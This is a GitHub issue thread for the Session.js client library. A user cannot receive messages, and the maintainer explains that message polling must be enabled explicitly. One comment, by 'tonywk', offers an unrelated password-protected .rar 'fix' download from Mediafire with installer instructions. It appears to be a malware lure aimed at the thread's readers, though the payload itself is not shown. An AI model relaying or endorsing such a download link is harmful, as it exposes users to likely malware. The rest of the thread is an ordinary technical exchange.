### ISSUE TITLE
Unable to receive events

### ISSUE THREAD

**Issue by AJVloper** [sessionjs/client#1]
Note: im running the code with "$ torify bun run index.js" due to privacy reasons

Im able to send messages, but no message can be received, this is the code im using

`import { Session, ready } from '@session.js/client';
async function keepAlive(){
    return new Promise((resolve, reject) => {
        setTimeout(resolve, Infinity)
    })
}

const session = new Session()
const mnemonic = ''
session.setMnemonic(mnemonic, 'Bot')

var recipient = ''
await session.sendMessage({
    to: recipient,
    text: 'Hello, world!'
})

session.on("message", (msg) => {
    console.log("Received session message")
    console.log(msg)
})

await keepAlive();
`

Why im using keepAlive()?
I don't know why but otherwise bun will end the code not expecting futher emits

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by VityaSchel** [comment]
Hello and thank you for using Session.js

Polling messages is opt-in functionality that must be enaed by adding poller. The upside is that you can add multiple pollers for different namespaces. I realise that the downside is that it is counterintuitive and I might add a warning in next updates.

Please get yourself familiar with documentation of polling: https://sessionjs.github.io/docs/getting-started/#polling-messages

And remove keepAlive call since pollers won't let bun exit anyway.
